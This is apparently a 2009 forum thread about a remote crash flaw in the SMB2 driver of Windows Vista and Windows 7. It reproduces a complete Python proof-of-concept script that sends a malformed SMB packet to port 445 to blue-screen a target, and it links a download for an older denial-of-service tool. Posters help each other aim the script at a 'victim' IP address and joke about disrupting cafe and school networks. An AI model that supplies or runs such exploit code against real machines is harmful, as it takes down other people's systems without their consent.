Sign in to follow this  
Followers 0
RightCoast

Time to party like it's 1999!

14 posts in this topic

Remember the glorious days of the 90's, when any 14 year old with cut and paste and the wherewithal to read for an hour could attack a Windows machine and give it remote BSOD? No? You are too young you say? Fear not, your time in the sun has come. ;)

The good old days are back baby! Microsoft seems to have made the teardrop attack possible again in Windows 7 ... uh, as an eminently wise Andover Prep/Yale cowboy once said ... "heckuva job Brownie!"

1

Share this post


Link to post
Share on other sites

"Windows Xp, 2k, are NOT affected as they dont have this driver."

I think that is why the phrase, "if it ain't broke don't fix it", was coined...

0

Share this post


Link to post
Share on other sites

One time back in the late '90s, some German hackers were fucking with me on Napster.

I used to have a lot of industrial and electronic music in my collection, and after downloading a bunch of my files, they PM'd me and asked if I had any mp3s of Cabaret Voltaire and KMFDM. I replied that I had some on my home computer, but was out in public at the moment with my laptop and did not have those files on hand. They replied with, "In that case then we will delete you."

I just finished typing, "OK whatever," when my machine suddenly froze up for several seconds and I got a BSOD. I rebooted the computer, restarted Napster and within seconds I got another BSOD. After this happened 3 or 4 more times, I rebooted, restarted Napster, and created a new user profile before connecting to the Internet. I was back on Napster for about half an hour before it happened again.

After rebooting, I discontinued using Napster and began searching the Web for information on how it might be possible for somebody to crash Windows over the Internet like this. Unfortunately, I never found any good information until years later when I talked to a friend about it. He told me it was a flaw in the TCP implementation of Windows 9x systems.

Kind of amusing that there's now at least a brief window where this sort of thing will be possible again.

Edited by Colonel Panic
0

Share this post


Link to post
Share on other sites

hmm. too bad the port's wont be on the internet to f with in less like 1999 everyone is plugged directly into the modem/internet. its just because smb2 is brand new and not the ancient ibm one, and pretty much every linux kernel has been rooted and the only way to be secure is to update every single time you can, and no ones talking shiz about linux bein insecure. interesting find none the less, kind of like confiker o0o0o0o0 its scary but not really a problem lols.

0

Share this post


Link to post
Share on other sites

One time back in the late '90s, some German hackers were fucking with me on Napster.

I used to have a lot of industrial and electronic music in my collection, and after downloading a bunch of my files, they PM'd me and asked if I had any mp3s of Cabaret Voltaire and KMFDM. I replied that I had some on my home computer, but was out in public at the moment with my laptop and did not have those files on hand. They replied with, "In that case then we will delete you."

I just finished typing, "OK whatever," when my machine suddenly froze up for several seconds and I got a BSOD. I rebooted the computer, restarted Napster and within seconds I got another BSOD. After this happened 3 or 4 more times, I rebooted, restarted Napster, and created a new user profile before connecting to the Internet. I was back on Napster for about half an hour before it happened again.

After rebooting, I discontinued using Napster and began searching the Web for information on how it might be possible for somebody to crash Windows over the Internet like this. Unfortunately, I never found any good information until years later when I talked to a friend about it. He told me it was a flaw in the TCP implementation of Windows 9x systems.

Kind of amusing that there's now at least a brief window where this sort of thing will be possible again.

That actually brought back alot of memories for me haha, thanks for that :)

A bit off topic but I bet you it was Super-KOD http://www.packetstormsecurity.org/DoS/SuperKoD-1.1.tgz It was actually a flaw in IGMP not TCP. I think it became public around 2001, but I know for sure that this was floating around IRC much earlier than this. It was interesting because at this point and time people had thought that the remote BSOD was long gone already.

*edited* to remove information on activities that I don't condone :sad:

Edited by mecca_
0

Share this post


Link to post
Share on other sites

One of the guys at our hacker space tried out this attack on another member's laptop which runs Vista. He used the Python script posted here: http://seclists.org/fulldisclosure/2009/Sep/0039.html

It worked! Her machine froze and within seconds the screen displayed a Black Screen of Death (the new, updated Vista version of the good ole Windows BSOD).

This attack only works from within a trusted LAN ("private" network) against machines running Windows Vista or Windows 7 which have SMB enabled.

Edited by Colonel Panic
0

Share this post


Link to post
Share on other sites

One of the guys at our hacker space tried out this attack on another member's laptop which runs Vista. He used the Python script posted here: http://seclists.org/fulldisclosure/2009/Sep/0039.html

It worked! Her machine froze and within seconds the screen displayed a Black Screen of Death (the new, updated Vista version of the good ole Windows BSOD).

This attack only works from within a trusted LAN ("private" network) against machines running Windows Vista or Windows 7 which have SMB enabled.

I haven't actually looked into it, so thanks for the update. Some Googling shows that Server 2008 is also affected, though you all might not have had that to test against.

In any case, while this may not be quite as hilariously annoying as hooking people up with a new cupholder after you saw on them on p2p when it was new, this can cause fair amounts of havoc in cafes and internal networks. Plus, I'd imagine the day is not far off where this is crafted into code where it is delivered as payload for other systems on a LAN. I'm thinking of some Humanities student opening up their free ipod email only to watch their friend's all BSOD, heh.

Hi school admins. Have fun this year. You poor, poor bastards. ;)

0

Share this post


Link to post
Share on other sites

In any case, while this may not be quite as hilariously annoying as hooking people up with a new cupholder after you saw on them on p2p when it was new, this can cause fair amounts of havoc in cafes and internal networks. Plus, I'd imagine the day is not far off where this is crafted into code where it is delivered as payload for other systems on a LAN. I'm thinking of some Humanities student opening up their free ipod email only to watch their friend's all BSOD, heh.

Hi school admins. Have fun this year. You poor, poor bastards. ;)

I'm sure Microsoft is already working diligently to develop an emergency security patch and will be pushing it out within a few days, so this exploit will just die an inglorious death before too many script-kiddies get hold of it.

:dry:

0

Share this post


Link to post
Share on other sites

I would really like to test this out with one of my Windows 7 Beta boxes.

Would I just replace "IP_ADDR" with the victims IP address and then run the script?

Any help would be appreciated, Thanks!

#!/usr/bin/python

# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a

# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket

from time import sleep

host = "IP_ADDR", 445

buff = (

"\x00\x00\x00\x90" # Begin SMB header: Session message

"\xff\x53\x4d\x42" # Server Component: SMB

"\x72\x00\x00\x00" # Negociate Protocol

"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853

"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"

"\x30\x30\x32\x00"

)

s = socket()

s.connect(host)

s.send(buff)

s.close()

0

Share this post


Link to post
Share on other sites

I would really like to test this out with one of my Windows 7 Beta boxes.

Would I just replace "IP_ADDR" with the victims IP address and then run the script?

Any help would be appreciated, Thanks!

#!/usr/bin/python

# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a

# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket

from time import sleep

IP_ADDR = "127.0.0.1"

host = "IP_ADDR", 445

buff = (

"\x00\x00\x00\x90" # Begin SMB header: Session message

"\xff\x53\x4d\x42" # Server Component: SMB

"\x72\x00\x00\x00" # Negociate Protocol

"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853

"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"

"\x30\x30\x32\x00"

)

s = socket()

s.connect(host)

s.send(buff)

s.close()

Wow, I am a dumbass.

I got that shit rolling.

Pretty neat.

Edited by schippystrich
0

Share this post


Link to post
Share on other sites


host = "IP_ADDR", 445

But you forgot to take off the quotes.


host = IP_ADDR, 445

0

Share this post


Link to post
Share on other sites

I am going to make an exploit video and post in on my website tomorrow. I'll link when it's done!

0

Share this post


Link to post
Share on other sites

But you forgot to take off the quotes.

host = IP_ADDR, 445

Oops, I forgot to change that, good catch.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0